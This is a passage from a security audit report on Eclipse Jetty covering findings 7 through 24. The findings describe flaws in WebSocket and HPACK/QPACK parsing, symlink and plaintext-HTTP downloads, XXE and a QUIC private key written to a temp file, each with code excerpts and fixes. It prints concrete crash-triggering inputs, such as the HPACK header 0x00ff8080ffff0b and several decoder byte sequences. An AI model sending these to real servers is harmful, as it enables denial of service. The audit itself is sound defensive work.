Description The WebSocket parser’s checkFrameSize method checks for payload lengths that exceed the current configuration’s maximum, but it does not check for payload lengths that are lower than zero. If the payload length is lower than zero, the code will throw an exception when the payload length is passed to a call to buffer.limit . Exploit Scenario An attacker sends a WebSocket payload with a length field that parses to a negative signed integer (refer to TOB-JETTY-6 ). This payload causes an exception to be thrown and possibly the server process to crash. Recommendations Short term, update checkFrameSize to throw an org.eclipse.jetty.websocket.core.exception.ProtocolException exception if the frame’s length field is less than zero. 46 OSTIF Eclipse: Jetty Security Assessment 8. WebSocket parser greedily allocates ByteBuers for large frames Severity: Medium Difficulty: Low Type: Denial of Service Finding ID: TOB-JETTY-8 Target: org.eclipse.jetty.websocket.core.internal.Parser Description When the WebSocket parser receives a partial frame in a ByteBuffer object and auto-fragmenting is disabled, the parser allocates a buffer of a size sufficient to store the entire frame at once: if (aggregate == null ) { if (available < payloadLength) { // not enough to complete this frame // Can we auto-fragment if (configuration.isAutoFragment() && isDataFrame) return autoFragment(buffer, available); // No space in the buffer, so we have to copy the partial payload aggregate = bufferPool.acquire(payloadLength, false ); BufferUtil.append(aggregate.getByteBuffer(), buffer); return null ; } //...[snip]... } Figure 8.1: Parser.java , lines 323–336 An attacker could send a WebSocket frame with a large payload length field, causing the server to allocate a buffer of a size equal to the specified payload length, without ever sending the entire frame contents. Therefore, an attacker can induce the consumption of gigabytes (or potentially exabytes; refer to TOB-JETTY-6 ) of memory by sending only hundreds or thousands of bytes over the wire. Exploit Scenario An attacker crafts a malicious WebSocket frame with a large payload length field but incomplete payload contents. The server then allocates a buffer of a size equal to the payload length field, causing an excessive consumption of RAM. To ensure that the connection is not promptly dropped, the attacker continues sending parts of this payload a few seconds apart, conducting a slow HTTP attack. 47 OSTIF Eclipse: Jetty Security Assessment Recommendations Short term, ensure that the default maximum payload size remains at a low value that is sufficient for most purposes (such as the current default of 64 KB). Long term, to better support large WebSocket frames, update the use of ByteBuffer objects in the WebSocket parser so that the parser does not allocate the entire buffer as soon as it parses the first fragment. Instead, the buffer should be expanded in relatively small increments (e.g., 10 MB or 100 MB at a time) and then written to only once the data sent by the client exceeds the length of the current buffer. That way, in order to induce the consumption of a large amount of RAM, an attacker would need to send a commensurate number of bytes over the wire. 48 OSTIF Eclipse: Jetty Security Assessment 9. Risk of integer overflow in HPACK's NBitInteger.decode Severity: Informational Difficulty: High Type: Data Validation Finding ID: TOB-JETTY-9 Target: org.eclipse.jetty.http2.hpack.internal.NBitInteger Description The static function NBitInteger.decode is used to decode bytestrings in HPACK's integer format. It should return only positive integers since HPACK’s integer format is not intended to support negative numbers. However, the following loop in NBitInteger.decode is susceptible to integer overflows in its multiplication and addition operations: public static int decode (ByteBuffer buffer, int n) { if (n == 8 ) { // ... } int nbits = 0xFF >>> ( 8 - n); int i = buffer.get(buffer.position() - 1 ) & nbits; if (i == nbits) { int m = 1 ; int b; do { b = 0xff & buffer.get(); i = i + (b & 127 ) * m; m = m * 128 ; } while ((b & 128 ) == 128 ); } return i; } Figure 9.1: NBitInteger.java , lines 105–145 For example, NBitInteger.decode(0xFF8080FFFF0F, 7) returns -16257 . Any overflow that occurs in the function would not be a problem on its own since, in general, the output of this function ought to be validated before it is used; however, when coupled with other issues (refer to TOB-JETTY-10 ), an overflow can cause vulnerabilities. 49 OSTIF Eclipse: Jetty Security Assessment Recommendations Short term, modify NBitInteger.decode to check that its result is nonnegative before returning it. Long term, consider merging the QPACK and HPACK implementations for NBitInteger , since they perform the same functionality; the QPACK implementation of NBitInteger checks for overflows. 50 OSTIF Eclipse: Jetty Security Assessment 10. MetaDataBuilder.checkSize accepts headers of negative lengths Severity: Medium Difficulty: High Type: Denial of Service Finding ID: TOB-JETTY-10 Target: org.eclipse.jetty.http2.hpack.internal.MetaDataBuilder Description The MetaDataBuilder.checkSize function accepts user-entered HPACK header values of negative sizes, which could cause a very large buffer to be allocated later when the user-entered size is multiplied by 2. MetaDataBuilder.checkSize determines whether a header name or value exceeds the size limit and throws an exception if the limit is exceeded: public void checkSize ( int length, boolean huffman) throws SessionException { // Apply a huffman fudge factor if (huffman) length = (length * 4 ) / 3 ; if ((_size + length) > _maxSize) throw new HpackException.SessionException( "Header too large %d > %d" , _size + length, _maxSize); } Figure 10.1: MetaDataBuilder.java , lines 291–298 However, it does not throw an exception if the size is negative. Later, the Huffman.decode function multiplies the user-entered length by 2 before allocating a buffer: public static String decode (ByteBuffer buffer, int length) throws HpackException.CompressionException { Utf8StringBuilder utf8 = new Utf8StringBuilder(length * 2 ); // ... Figure 10.2: Huffman.java , lines 357–359 This means that if a user provides a negative length value (or, more precisely, a length value that becomes negative when multiplied by the 4/3 fudge factor), and this length value becomes a very large positive number when multiplied by 2, then the user can cause a very large buffer to be allocated on the server. 51 OSTIF Eclipse: Jetty Security Assessment Exploit Scenario An attacker repeatedly sends HTTP messages with the HPACK header 0x00ff8080ffff0b . Each time this header is decoded, the following occurs: ● HpackDecode.decode determines that a Huffman-coded value of length -1073758081 needs to be decoded. ● MetaDataBuilder.checkSize approves this length. ● The number is multiplied by 2, resulting in 2147451134 , and Huffman.decode allocates a 2.1 GB string array. ● Huffman.decode experiences a buffer overflow error, and the array is deallocated the next time garbage collection happens. (Note that this deallocation can be delayed by adding valid Huffman-coded characters to the end of the header.) Depending on the timing of garbage collection, the number of threads, and the amount of memory available on the server, this may cause the server to run out of memory. Recommendations Short term, have MetaDataBuilder.checkSize check that the given length is positive directly before adding it to _size and comparing it with _maxSize . Long term, add checks for integer overflows in Huffman.decode and in NBitInteger.decode (refer to TOB-JETTY-9 ) for added redundancy. 52 OSTIF Eclipse: Jetty Security Assessment 11. Insucient space allocated when encoding QPACK instructions and entries Severity: Low Difficulty: High Type: Denial of Service Finding ID: TOB-JETTY-11 Target: ● org.eclipse.jetty.http3.qpack.internal.instruction.IndexedName EntryInstruction ● org.eclipse.jetty.http3.qpack.internal.instruction.LiteralName EntryInstruction ● org.eclipse.jetty.http3.qpack.internal.instruction.EncodableEn try Description Multiple expressions do not allocate enough buffer space when encoding QPACK instructions and entries, which could result in a buffer overflow exception. In IndexedNameEntry , the following expression determines how much space to allocate when encoding the instruction: int size = NBitIntegerEncoder.octetsNeeded( 6 , _index) + (_huffman ? HuffmanEncoder.octetsNeeded(_value) : _value.length()) + 2 ; Figure 11.1: IndexedNameEntry.java , line 58 Later, the following two lines encode the value size for Huffman-coded and non-Huffman-coded strings, respectively: NBitIntegerEncoder.encode(byteBuffer, 7 , HuffmanEncoder.octetsNeeded(_value)); // ... NBitIntegerEncoder.encode(byteBuffer, 7 , _value.length()); Figure 11.2: IndexedNameEntry.java , lines 71 and 77 These encodings can take up more than 1 byte if the value’s length is over 126 because the number will fill up the 7 bits given to it in the first byte. However, the int size expression in figure 11.1 assumes that it will take up only 1 byte. Thus, if the value’s length is over 126, too few bytes may be allocated for the instruction, causing a buffer overflow. The same problem occurs in LiteralNameEntryInstruction : 53 OSTIF Eclipse: Jetty Security Assessment int size = (_huffmanName ? HuffmanEncoder.octetsNeeded(_name) : _name.length()) + (_huffmanValue ? HuffmanEncoder.octetsNeeded(_value) : _value.length()) + 2 ; Figure 11.3: LiteralNameEntryInstruction.java , lines 59–60 This expression assumes that the name's length will fit into 5 bits and that the value’s length will fit into 7 bits. If the name’s length is over 30 bytes or the value’s length is over 126 bytes, these assumptions will be false and too little space may be allocated for the instruction, which could cause a buffer overflow. A similar problem occurs in EncodableEntry.ReferencedNameEntry . The getRequiredSize method in this file calculates how much space should be allocated for its encoding: public int getRequiredSize ( int base) { String value = getValue(); int relativeIndex = _nameEntry.getIndex() - base; int valueLength = _huffman ? HuffmanEncoder.octetsNeeded(value) : value.length(); return 1 + NBitIntegerEncoder.octetsNeeded( 4 , relativeIndex) + 1 + NBitIntegerEncoder.octetsNeeded( 7 , valueLength) + valueLength; } Figure 11.4: EncodableEntry.java , lines 181–187 The method returns the wrong size if the value is longer than 126 bytes. Additionally, it assumes that the name will use a post-base reference rather than a normal one, which may be incorrect. An additional problem is present in this method. It assumes that value ’s length in bytes will be returned by value.length() . However, value.length() measures the number of characters in value , not the number of bytes, so if value contains multibyte characters (e.g., UTF-8), too few bytes will be allocated. The length of value should be calculated by using value.getBytes() instead of value.length() . The getRequiredSize method in EncodableEntry.LiteralEntry also incorrectly uses value.length() : public int getRequiredSize ( int base) { String name = getName(); String value = getValue(); int nameLength = _huffman ? HuffmanEncoder.octetsNeeded(name) : name.length(); int valueLength = _huffman ? HuffmanEncoder.octetsNeeded(value) : value.length(); return 2 + NBitIntegerEncoder.octetsNeeded( 3 , nameLength) + nameLength + NBitIntegerEncoder.octetsNeeded( 7 , valueLength) + valueLength; 54 OSTIF Eclipse: Jetty Security Assessment } Figure 11.5: EncodableEntry.java , lines 243–250 Note that name.length() is used to measure the byte length of name , and value.length() is used to measure the byte length of value . Jetty’s HTTP/3 code is still considered experimental, so this issue should not affect production code, but it should be fixed before announcing HTTP/3 support to be production-ready. Recommendations Short term, change the relevant expressions to account for the extra length. Long term, build out additional test cases for QPACK and other parsers used in HTTP/3 to test for the correct handling of edge cases and identify memory handling exceptions. 55 OSTIF Eclipse: Jetty Security Assessment 12. LiteralNameEntryInstruction incorrectly encodes value length Severity: Medium Difficulty: Medium Type: Denial of Service Finding ID: TOB-JETTY-12 Target: org.eclipse.jetty.http3.qpack.internal.instruction.LiteralNameEntryI nstruction Description QPACK instructions for inserting entries with literal names and non-Huffman-coded values will be encoded incorrectly when the value’s length is over 30, which could cause values to be sent incorrectly or errors to occur during decoding. The following snippet of the LiteralNameEntryInstruction.encode function is responsible for encoding the header value: if (_huffmanValue) byteBuffer.put(( byte )( 0x80 )); NBitIntegerEncoder.encode(byteBuffer, 7 , HuffmanEncoder.octetsNeeded(_value)); HuffmanEncoder.encode(byteBuffer, _value); 78 79 { 80 81 82 83 } 84 85 { 86 87 88 89 } else byteBuffer.put(( byte )( 0x00 )); NBitIntegerEncoder.encode(byteBuffer, 5 , _value.length()); byteBuffer.put(_value.getBytes()); Figure 12.1: LiteralNameEntryInstruction.java , lines 78–89 On line 87, 5 is the second parameter to NBitIntegerEncoder.encode , indicating that the number will take up 5 bits in the first encoded byte; however, the second parameter should be 7 instead. This means that when _value.length() is over 30, it will be incorrectly encoded. Jetty’s HTTP/3 code is still considered experimental, so this issue should not affect production code, but it should be fixed before announcing HTTP/3 support to be production-ready. 56 OSTIF Eclipse: Jetty Security Assessment Recommendations Short term, change the second parameter of the NBitIntegerEncoder.encode function from 5 to 7 in order to reflect that the number will take up 7 bits. Long term, write more tests to catch similar encoding/decoding problems. 57 OSTIF Eclipse: Jetty Security Assessment 13. FileInitializer does not check for symlinks Severity: High Difficulty: High Type: Data Validation Finding ID: TOB-JETTY-13 Target: org.eclipse.jetty.start.FileInitializer Description Module configuration files can direct Jetty to download a remote file and save it in the local filesystem while initializing the module. During this process, the FileInitializer class validates the destination path and throws an IOException exception if the destination is outside the ${jetty.base} directory. However, this validation routine does not check for symlinks: // now on copy/download paths (be safe above all else) if (destination != null && !destination.startsWith(_basehome.getBasePath())) throw new IOException( "For security reasons, Jetty start is unable to process file resource not in ${jetty.base} - " + location); Figure 13.1: FileInitializer.java , lines 112–114 None of the subclasses of FileInitializer check for symlinks either. Thus, if the ${jetty.base} directory contains a symlink, a file path in a module’s .ini file beginning with the symlink name will pass the validation check, and the file will be written to a subdirectory of the symlink’s destination. Exploit Scenario A system’s ${jetty.base} directory contains a symlink called dir , which points to /etc . The system administrator enables a Jetty module whose .ini file contains a [files] entry that downloads a remote file and writes it to the relative path dir/config.conf . The filesystem follows the symlink and writes a new configuration file to /etc/config.conf , which impacts the server’s system configuration. Additionally, since the FileInitializer class uses the REPLACE_EXISTING flag, this behavior overwrites an existing system configuration file. Recommendations Short term, rewrite all path checks in FileInitializer and its subclasses to include a call to the Path.toRealPath function, which, by default, will resolve symlinks and produce the real filesystem path pointed to by the Path object. If this real path is outside ${jetty.base} , the file write operation should fail. 58 OSTIF Eclipse: Jetty Security Assessment Long term, consolidate all filesystem operations involving the ${jetty.base} or ${jetty.home} directories into a single centralized class that automatically performs symlink resolution and rejects operations that attempt to read from or write to an unauthorized directory. This class should catch and handle the IOException exception that is thrown in the event of a link loop or a large number of nested symlinks. 59 OSTIF Eclipse: Jetty Security Assessment 14. FileInitializer permits downloading files via plaintext HTTP Severity: High Difficulty: High Type: Data Exposure Finding ID: TOB-JETTY-14 Target: org.eclipse.jetty.start.FileInitializer Description Module configuration files can direct Jetty to download a remote file and save it in the local filesystem while initializing the module. If the specified URL is a plaintext HTTP URL, Jetty does not raise an error or warn the user. Transmitting files over plaintext HTTP is intrinsically unsecure and exposes sensitive data to tampering and eavesdropping in transit. Exploit Scenario A system administrator enables a Jetty module that downloads a remote file over plaintext HTTP during initialization. An attacker with a network intermediary position sniffs the traffic and infers sensitive information about the design and configuration of the Jetty system under configuration. Alternatively, the attacker actively tampers with the file during transmission from the remote server to the Jetty installation, which enables the attacker to alter the module’s behavior and launch other attacks against the targeted system. Recommendations Short term, add a check to the FileInitializer class and its subclasses to prohibit downloads over plaintext HTTP. Additionally, add a validation check to the module .ini file parser to reject any configuration that includes a plaintext HTTP URL in the [files] section. Long term, consolidate all remote file downloads conducted during module configuration operations into a single centralized class that automatically rejects plaintext HTTP URLs. If current use cases require support of plaintext HTTP URLs, then at a minimum, have Jetty display a prominent warning message and prompt the user for manual confirmation before performing the unencrypted download. 60 OSTIF Eclipse: Jetty Security Assessment 15. NullPointerException thrown by FastCGI parser on invalid frame type Severity: Medium Difficulty: Low Type: Data Validation Finding ID: TOB-JETTY-15 Target: org.eclipse.jetty.fcgi.parser.Parser Description Because of a missing null check, the Jetty FastCGI client’s Parser class throws a NullPointerException exception when parsing a frame with an invalid frame type field. This exception occurs because the findContentParser function returns null when it does not have a ContentParser object matching the specified frame type, and the caller never checks the findContentParser return value for null before dereferencing it. case CONTENT: { ContentParser contentParser = findContentParser(headerParser.getFrameType()); if (headerParser.getContentLength() == 0 ) { padding = headerParser.getPaddingLength(); state = State.PADDING; if (contentParser.noContent()) return true ; } else { ContentParser.Result result = contentParser.parse(buffer); // ...[snip]... } break ; } Figure 15.1: Parser.java , lines 82–114 Exploit Scenario An attacker operates a malicious web server that supports FastCGI. A Jetty application communicates with this server by using Jetty’s built-in FastCGI client. The remote server transmits a frame with an invalid frame type, causing a NullPointerException exception and a crash in the Jetty application. Recommendations Short term, add a null check to the parse function to abort the parsing process before dereferencing a null return value from findContentParser . If a null value is detected, 61 OSTIF Eclipse: Jetty Security Assessment parse should throw an appropriate exception, such as IllegalStateException , that Jetty can catch and handle safely. Long term, build out a larger suite of test cases that ensures graceful handling of malformed traffic and data. 62 OSTIF Eclipse: Jetty Security Assessment 16. Documentation does not specify that request contents and other user data can be exposed in debug logs Severity: Medium Difficulty: High Type: Data Exposure Finding ID: TOB-JETTY-16 Target: Jetty 12 Operations Guide; numerous locations throughout the codebase Description Over 100 times, the system calls LOG.debug with a parameter of the format BufferUtil.toDetailString(buffer) , which outputs up to 56 bytes of the buffer into the log file. Jetty’s implementations of various protocols and encodings, including GZIP, WebSocket, multipart encoding, and HTTP/2, output user data received over the network to the debug log using this type of call. An example instance from Jetty’s WebSocket implementation appears in figure 16.1. public Frame.Parsed parse (ByteBuffer buffer) throws WebSocketException { try { // parse through while (buffer.hasRemaining()) { if (LOG.isDebugEnabled()) LOG.debug( "{} Parsing {}" , this , BufferUtil.toDetailString(buffer)); // ...[snip]... } // ...[snip]... } // ...[snip]... } Figure 16.1: Parser.java , lines 88–96 Although the Jetty 12 Operations Guide does state that Jetty debugging logs can quickly consume massive amounts of disk space, it does not advise system administrators that the logs can contain sensitive user data, such as personally identifiable information. Thus, the possibility of raw traffic being captured from debug logs is undocumented. Exploit Scenario A Jetty system administrator turns on debug logging in a production environment. During the normal course of operation, a user sends traffic containing sensitive information, such as personally identifiable information or financial data, and this data is recorded to the 63 OSTIF Eclipse: Jetty Security Assessment debug log. An attacker who gains access to this log can then read the user data, compromising data confidentiality and the user’s privacy rights. Recommendations Short term, update the Jetty Operations Guide to state that in addition to being extremely large, debug logs can contain sensitive user data and should be treated as sensitive. Long term, consider moving all debugging messages that contain buffer excerpts into a high-detail debug log that is enabled only for debug builds of the application. 64 OSTIF Eclipse: Jetty Security Assessment 17. HttpStreamOverFCGI internally marks all requests as plaintext HTTP Severity: High Difficulty: High Type: Data Validation Finding ID: TOB-JETTY-17 Target: org.eclipse.jetty.fcgi.server.internal.HttpStreamOverFCGI Description The HttpStreamOverFCGI class processes FastCGI messages in a format that can be processed by other system components that use the HttpStream interface. This class’s onHeaders callback mistakenly marks each MetaData.Request object as a plaintext HTTP request, as the “TODO” comment shown in figure 17.1 indicates: public void onHeaders () { String pathQuery = URIUtil.addPathQuery(_path, _query); // TODO https? MetaData.Request request = new MetaData.Request(_method, HttpScheme.HTTP.asString(), hostPort, pathQuery, HttpVersion.fromString(_version), _headers, Long.MIN_VALUE); // ...[snip]... } Figure 17.1: HttpStreamOverFCGI.java , lines 108–119 In some configurations, other Jetty components could misinterpret a message received over FCGI as a plaintext HTTP message, which could cause a request to be incorrectly rejected, redirected in an infinite loop, or forwarded to another system over a plaintext HTTP channel instead of HTTPS. Exploit Scenario A Jetty instance runs an FCGI server and uses the HttpStream interface to process messages. The MetaData.Request class’s getURI method is used to check the incoming request’s URI. This method mistakenly returns a plaintext HTTP URL due to the bug in HttpStreamOverFCGI.java . One of the following takes place during the processing of this request: ● ● An application-level security control checks the incoming request’s URI to ensure it was received over a TLS-encrypted channel. Since this check fails, the application rejects the request and refuses to process it, causing a denial of service. An application-level security control checks the incoming request’s URI to ensure it was received over a TLS-encrypted channel. Since this check fails, the application 65 OSTIF Eclipse: Jetty Security Assessment attempts to redirect the user to a suitable HTTPS URL. The check fails on this redirected request as well, causing an infinite redirect loop and a denial of service. ● An application processing FCGI messages acts as a proxy, forwarding certain requests to a third HTTP server. It uses MetaData.Request.getURI to check the request’s original URI and mistakenly sends a request over plaintext HTTP. Recommendations Short term, correct the bug in HttpStreamOverFCGI.java to generate the correct URI for the incoming request. Long term, consider streamlining the HTTP implementation to minimize the need for different classes to generate URIs from request data. 66 OSTIF Eclipse: Jetty Security Assessment 18. Excessively permissive and non-standards-compliant error handling in HTTP/2 implementation Severity: Low Difficulty: High Type: Data Validation Finding ID: TOB-JETTY-18 Target: The org.eclipse.jetty.http2.parser and org.eclipse.jetty.http2.parser packages Description Jetty’s HTTP/2 implementation violates RFC 9113 in that it fails to terminate a connection with an appropriate error code when the remote peer sends a frame with one of the following protocol violations: ● ● ● A SETTINGS frame with the ACK flag set and a nonzero payload length A PUSH_PROMISE frame in a stream with push disabled A GOAWAY frame with its stream ID not set to zero None of these situations creates an exploitable vulnerability. However, noncompliant protocol implementations can create compatibility problems and could cause vulnerabilities when deployed in combination with other misconfigured systems. Exploit Scenario A Jetty instance connects to an HTTP/2 server, or serves a connection from an HTTP/2 client, and the remote peer sends traffic that should cause Jetty to terminate the connection. Instead, Jetty keeps the connection alive, in violation of RFC 9113. If the remote peer is programmed to handle the noncompliant traffic differently than Jetty, further problems could result, as the two implementations interpret protocol messages differently. Recommendations Short term, update the HTTP/2 implementation to check for the following error conditions and terminate the connection with an error code that complies with RFC 9113: ● ● A peer receives a SETTINGS frame with the ACK flag set and a payload length greater than zero. A client receives a PUSH_PROMISE frame after having sent, and received an acknowledgement for, a SETTINGS frame with SETTINGS_ENABLE_PUSH equal to zero. 67 OSTIF Eclipse: Jetty Security Assessment ● A peer receives a GOAWAY frame with the stream identifier field not set to zero. Long term, audit Jetty’s implementation of HTTP/2 and other protocols to ensure that Jetty handles errors in a standards-compliant manner and terminates connections as required by the applicable specifications. 68 OSTIF Eclipse: Jetty Security Assessment 19. XML external entities and entity expansion in Maven package metadata parser Severity: High Difficulty: High Type: Data Validation Finding ID: TOB-JETTY-19 Target: org.eclipse.jetty.start.fileinits.MavenMetadata Description During module initialization, the MavenMetadata class parses maven-metadata.xml files when the module configuration includes a maven:// URI in its [files] section. The DocumentBuilderFactory class is used with its default settings, meaning that document type definitions (DTD) are allowed and are applied. This behavior leaves the MavenMetadata class vulnerable to XML external entity (XXE) and XML entity expansion (XEE) attacks. These vulnerabilities could enable a variety of exploits, including server-side request forgery on the server’s local network and arbitrary file reads from the server’s filesystem. Exploit Scenario An attacker causes a Jetty installation to parse a maliciously crafted maven-metadata.xml file, such as by uploading a malicious package to a Maven repository, inducing an out-of-band download of the malicious package through social engineering, or by placing the maven-metadata.xml file on the server’s filesystem through other means. When the XML file is parsed, the XML-based attack is launched. The attacker could leverage this vector to do any of the following: ● ● ● Induce HTTP requests to servers on the server’s local network Read and exfiltrate arbitrary files on the server’s filesystem Consume excessive system resources with an XEE, causing a denial of service Recommendations Short term, disable parsing of DTDs in MavenMetadata so that maven-metadata.xml files cannot be used as a vector for XML-based attacks. Disabling DTDs may require knowledge of the underlying XML parser implementation returned by the DocumentBuilderFactory class. Long term, review default configurations and attributes supported by XML parsers that may be returned by the DocumentBuilderFactory to ensure that DTDs are properly disabled. 69 OSTIF Eclipse: Jetty Security Assessment 20. Use of deprecated AccessController class Severity: Informational Difficulty: N/A Type: Code Quality Finding ID: TOB-JETTY-20 Target: ● org.eclipse.jetty.logging.JettyLoggerConfiguration ● org.eclipse.jetty.util.MemoryUtils ● org.eclipse.jetty.util.TypeUtil ● org.eclipse.jetty.util.thread.PrivilegedThreadFactory ● org.eclipse.jetty.ee10.servlet.ServletContextHandler ● org.eclipse.jetty.ee9.nested.ContextHandler Description The classes listed in the “Target” cell above use the java.security.AccessController class, which is a deprecated class slated to be removed in a future Java release. The java.security library documentation states that the AccessController class “is only useful in conjunction with the Security Manager,” which is also deprecated. Thus, the use of AccessController no longer serves any beneficial purpose. The use of this deprecated class could impact Jetty’s compatibility with future releases of the Java SDK. Recommendations Short term, remove all uses of the AccessController class. Long term, audit the Jetty codebase for the use of classes in the java.security package that may not provide any value in Jetty 12, and remove all references to those classes. 70 OSTIF Eclipse: Jetty Security Assessment 21. QUIC server writes SSL private key to temporary plaintext file Severity: High Difficulty: High Type: Cryptography Finding ID: TOB-JETTY-21 Target: org.eclipse.jetty.quic.server.QuicServerConnector Description Jetty’s QUIC implementation uses quiche, a QUIC and HTTP/3 library maintained by Cloudflare. When the server’s SSL certificate is handed off to quiche, the private key is extracted from the existing keystore and written to a temporary plaintext PEM file: protected void doStart () throws Exception { // ...[snip]... char [] keyStorePassword = sslContextFactory.getKeyStorePassword().toCharArray(); String keyManagerPassword = sslContextFactory.getKeyManagerPassword(); SSLKeyPair keyPair = new SSLKeyPair( sslContextFactory.getKeyStoreResource().getPath(), sslContextFactory.getKeyStoreType(), keyStorePassword, alias, keyManagerPassword == null ? keyStorePassword : keyManagerPassword.toCharArray() ); File[] pemFiles = keyPair.export( new File(System.getProperty( "java.io.tmpdir" ))); privateKeyFile = pemFiles[ 0 ]; certificateChainFile = pemFiles[ 1 ]; } Figure 21.1: QuicServerConnector.java , lines 154–179 Storing the private key in this manner exposes it to increased risk of theft. Although the QuicServerConnector class deletes the private key file upon stopping the server, this deleted file may not be immediately removed from the physical storage medium, exposing the file to potential theft by attackers who can access the raw bytes on the disk. A review of quiche suggests that the library’s API may not support reading a DES-encrypted keyfile. If that is true, then remediating this issue would require updates to the underlying quiche library. 71 OSTIF Eclipse: Jetty Security Assessment Exploit Scenario An attacker gains read access to a Jetty HTTP/3 server’s temporary directory while the server is running. The attacker can retrieve the temporary keyfile and read the private key without needing to obtain or guess the encryption key for the original keystore. With this private key in hand, the attacker decrypts and tampers with all TLS communications that use the associated certificate. Recommendations Short term, investigate the quiche library’s API to determine whether it can readily support password-encrypted private keyfiles. If so, update Jetty to save the private key in a temporary password-protected file and to forward that password to quiche. Alternatively, if password-encrypted private keyfiles can be supported, have Jetty pass the unencrypted private key directly to quiche as a function argument. Either option would obviate the need to store the key in a plaintext file on the server’s filesystem. If quiche does not support either of these changes, open an issue or pull request for quiche to implement a fix for this issue. 72 OSTIF Eclipse: Jetty Security Assessment 22. Repeated code between HPACK and QPACK Severity: Informational Difficulty: N/A Type: Code Quality Finding ID: TOB-JETTY-22 Target: ● org.eclipse.jetty.http2.hpack.internal.NBitInteger ● org.eclipse.jetty.http2.hpack.internal.Huffman ● org.eclipse.jetty.http3.qpack.internal.util.NBitIntegerParser ● org.eclipse.jetty.http3.qpack.internal.util.NBitIntegerEncode ● org.eclipse.jetty.http3.qpack.internal.util.HuffmanDecoder ● org.eclipse.jetty.http3.qpack.internal.util.HuffmanEncoder Description Classes for dealing with n-bit integers and Huffman coding are implemented both in the jetty-http2-hpack and in jetty-http3-qpack libraries. These classes have very similar functionality but are implemented in two different places, sometimes with identical code and other times with different implementations. In some cases ( TOB-JETTY-9 ), one implementation has a bug that the other implementation does not have. The codebase would be easier to maintain and keep secure if the implementations were merged. Exploit Scenario A vulnerability is found in the Huffman encoding implementation, which has identical code in HPACK and QPACK. The vulnerability is fixed in one implementation but not the other, leaving one of the implementations vulnerable. Recommendations Short term, merge the two implementations of n-bit integers and Huffman coding classes. Long term, audit the Jetty codebase for other classes with very similar functionality. 73 OSTIF Eclipse: Jetty Security Assessment 23. Various exceptions in HpackDecoder.decode and QpackDecoder.decode Severity: Informational Difficulty: N/A Type: Denial of Service Finding ID: TOB-JETTY-23 Target: org.eclipse.jetty.http2.hpack.HpackDecoder , org.eclipse.jetty.http3.qpack.QpackDecoder Description The HpackDecoder and QpackDecoder classes both throw unexpected Java-level exceptions: ● HpackDecoder.decode(0x03) throws BufferUnderflowException . ● HpackDecoder.decode(0x4800) throws NumberFormatException . ● HpackDecoder.decode(0x3fff 2e) throws IllegalArgumentException . ● HpackDecoder.decode(0x3fff 81ff ff2e) throws NullPointerException . ● HpackDecoder.decode(0xffff ffff f8ff ffff ffff ffff ffff ffff ffff ffff ffff ffff 0202 0000) throws ArrayIndexOutOfBoundsException . ● QpackDecoder.decode(..., 0x81, ...) throws IndexOutOfBoundsException . ● QpackDecoder.decode(..., 0xfff8 ffff f75b, ...) throws ArithmeticException . For both HPACK and QPACK, these exceptions appear to be caught higher up in the call chain by catch (Throwable x) statements every time the decode functions are called. However, catching them within decode and throwing a Jetty-level exception within the catch statement would result in cleaner, more robust code. Exploit Scenario Jetty developers refactor the codebase, moving function calls around and introducing a new point in the code where HpackDecoder.decode is called. Assuming that decode will throw only org.jetty… errors, they forget to wrap this call in a catch (Throwable x) statement. This results in a DoS vulnerability. Recommendations Short term, document in the code that Java-level exceptions can be thrown. Long term, modify the decode functions so that they throw only Jetty-level exceptions. 74 OSTIF Eclipse: Jetty Security Assessment 24. Incorrect QPACK encoding when multi-byte characters are used Severity: Medium Difficulty: Medium Type: Data Validation Finding ID: TOB-JETTY-24 Target: org.eclipse.jetty.http3.qpack.internal.EncodableEntry Description Java’s string.length() function returns the number of characters in a string, which can be different from the number of bytes returned by the string.getBytes() function. However, QPACK encoding methods assume that they return the same number, which could cause incorrect encodings. In EncodableEntry.LiteralEntry , which is used to encode HTTP/3 header fields, the following method is used for encoding: public void encode (ByteBuffer buffer, int base) 214 215 { 216 byte allowIntermediary = 0x00 ; // TODO: this is 0x10 bit, when should this be set? 217 218 219 220 221 222 223 224 String name = getName(); String value = getValue(); // Encode the prefix code and the name. if (_huffman) { buffer.put(( byte )( 0x28 | allowIntermediary)); NBitIntegerEncoder.encode(buffer, 3 , HuffmanEncoder.octetsNeeded(name)); 225 226 227 HuffmanEncoder.encode(buffer, name); buffer.put(( byte ) 0x80 ); NBitIntegerEncoder.encode(buffer, 7 , HuffmanEncoder.octetsNeeded(value)); 228 229 230 231 232 HuffmanEncoder.encode(buffer, value); } else { // TODO: What charset should we be using? (this applies to the instruction generators as well). 233 234 235 236 237 238 buffer.put(( byte )( 0x20 | allowIntermediary)); NBitIntegerEncoder.encode(buffer, 3 , name.length()); buffer.put(name.getBytes()); buffer.put(( byte ) 0x00 ); NBitIntegerEncoder.encode(buffer, 7 , value.length()); buffer.put(value.getBytes()); 75 OSTIF Eclipse: Jetty Security Assessment 239 240 } } Figure 24.1: EncodableEntry.java , lines 214–240 Note in particular lines 232–238, which are used to encode literal (non-Huffman-coded) names and values. The value returned by name.length() is added to the bytestring, followed by the value returned by name.getBytes() . Then, the value returned by value.length() is added to the bytestring, followed by the value returned by value.getBytes() . When this bytestring is decoded, the decoder will read the name length field and then read that many bytes as the name. If multibyte characters were used in the name field, the decoder will read too few bytes. The rest of the bytestring will also be decoded incorrectly, since the decoder will continue reading at the wrong point in the bytestring. The same issue occurs if multibyte characters were used in the value field. The same issue appears in EncodableEntry.ReferencedNameEntry.encode : if (_huffman) 164 // Encode the value. 165 String value = getValue(); 166 167 { 168 169 170 171 } 172 173 { 174 175 176 177 } else buffer.put(( byte ) 0x80 ); NBitIntegerEncoder.encode(buffer, 7 , HuffmanEncoder.octetsNeeded(value)); HuffmanEncoder.encode(buffer, value); buffer.put(( byte ) 0x00 ); NBitIntegerEncoder.encode(buffer, 7 , value.length()); buffer.put(value.getBytes()); Figure 24.2: EncodableEntry.java , lines 164–177 If value has multibyte characters, it will be incorrectly encoded in lines 174–176. Jetty’s HTTP/3 code is still considered experimental, so this issue should not affect production code, but it should be fixed before announcing HTTP/3 support to be production-ready. Exploit Scenario A Jetty server attempts to add the Set-Cookie header, setting a cookie value to a UTF-8-encoded string that contains multibyte characters. This causes an incorrect cookie value to be set and the rest of the headers in this message to be parsed incorrectly. 76 OSTIF Eclipse: Jetty Security Assessment Recommendations Short term, have the encode function in both EncodableEntry.LiteralEntry and EncodableEntry.ReferencedNameEntry encode the length of the string using string.getBytes() rather than string.length() . 77 OSTIF Eclipse: Jetty Security Assessment 25. No limits on maximum capacity in QPACK decoder 